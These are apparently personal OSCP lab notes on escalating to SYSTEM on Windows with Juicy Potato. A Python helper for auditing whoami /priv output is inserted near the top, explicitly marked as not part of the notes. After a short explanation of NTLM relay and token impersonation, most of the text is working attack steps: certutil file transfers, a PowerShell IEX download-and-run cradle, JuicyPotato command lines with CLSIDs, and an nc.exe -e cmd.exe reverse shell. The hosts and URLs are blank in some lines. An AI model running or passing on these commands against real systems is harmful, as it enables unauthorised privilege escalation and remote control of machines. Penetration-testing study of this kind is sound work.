OSCP Notes

juicy potato

Executing whoami /priv shows that SeImpersonatePrivilege is enabled → Juicy Potato!
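As an added check (not part of these notes): a small Python helper that parses the output of whoami /priv and reports whether the token carries the privileges Juicy Potato depends on, useful when auditing which service accounts are exposed. The function names and the sample output are constructed for this example; SeAssignPrimaryTokenPrivilege is listed alongside SeImpersonatePrivilege as the alternative privilege the tool accepts.

```python
# Privileges Juicy Potato relies on: the notes name SeImpersonatePrivilege;
# SeAssignPrimaryTokenPrivilege is the alternative the tool also accepts.
POTATO_PRIVILEGES = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")


def parse_whoami_priv(output: str) -> dict:
    """Return {privilege_name: state} from `whoami /priv` text.

    The table has three columns (Name, Description, State). The description
    may contain spaces, so only the first and last whitespace-separated
    tokens of each row are used."""
    privileges = {}
    in_table = False
    for line in output.splitlines():
        stripped = line.strip()
        if stripped.startswith("====="):  # separator under the column headers
            in_table = True
            continue
        if not in_table or not stripped:
            continue
        fields = stripped.split()
        if len(fields) < 2 or not fields[0].startswith("Se"):
            continue
        privileges[fields[0]] = fields[-1]
    return privileges


def potato_exposure(privileges: dict) -> dict:
    """Return the Juicy Potato-relevant privileges present on the token.

    A privilege marked Disabled still counts: a process can enable any
    privilege present on its token (AdjustTokenPrivileges), so 'Disabled'
    is not a mitigation; only removing it from the service's token is."""
    return {n: s for n, s in privileges.items() if n in POTATO_PRIVILEGES}


# Constructed sample of `whoami /priv` output from a typical service account.
SAMPLE_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    exposure = potato_exposure(parse_whoami_priv(SAMPLE_OUTPUT))
    print("Juicy Potato candidate:" if exposure else "Not exposed:", exposure)
```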
The idea behind this vulnerability is simple to describe at a high level:
  1. Trick the "NT AUTHORITY\SYSTEM" account into authenticating via NTLM to a TCP endpoint we control.
  2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the "NT AUTHORITY\SYSTEM" account. This is done through a series of Windows API calls.
  3. Impersonate the token we have just negotiated. This can only be done if the attacker's current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.
We’ll basically be tricking DCOM/RPC into NTLM authenticating to us. The advantage of this more complex method is that it is 100% reliable, consistent across Windows versions, and fires instantly rather than sometimes having to wait for Windows Update.
Transfer the file over:
certutil -urlcache -split -f C:\Windows\Temp\JuicyPotato.exe
Now I copied the .ps1 shell file, adjusted the port to 4444 and started another netcat listener.
Now, I created a .bat file that contains the following code:
powershell "IEX (New-Object Net.Webclient).downloadstring('')"
Then, I transferred the file over to the target machine and named it reverse.bat:
certutil -urlcache -split -f C:\Users\Public\reverse.bat
Finally, I ran the following command (the -l 1111 is not doing anything here):
.\JuicyPotato.exe -t * -p .\reverse.bat -l 1111 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
For the CLSID value, I just used one of the many listed here: https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/
For x86:
.\Juicy.Potato.x86.exe -t * -p .\reverse.bat -l 1111 -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
.\Juicy.Potato.x86.exe -t * -p c:\admin\procexp.exe -l 5837 -c "{659cdea7-489e-11d9-a9cd-000d56965251}"
Reverse shell example:
.\Juicy.Potato.x86.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c C:\wamp\www\PHP\gori\fileManager\collectives\DG0\gori\nc.exe -e cmd.exe 443" -t * -c "{6d18ad12-bde3-4393-b311-099c346e6df9}"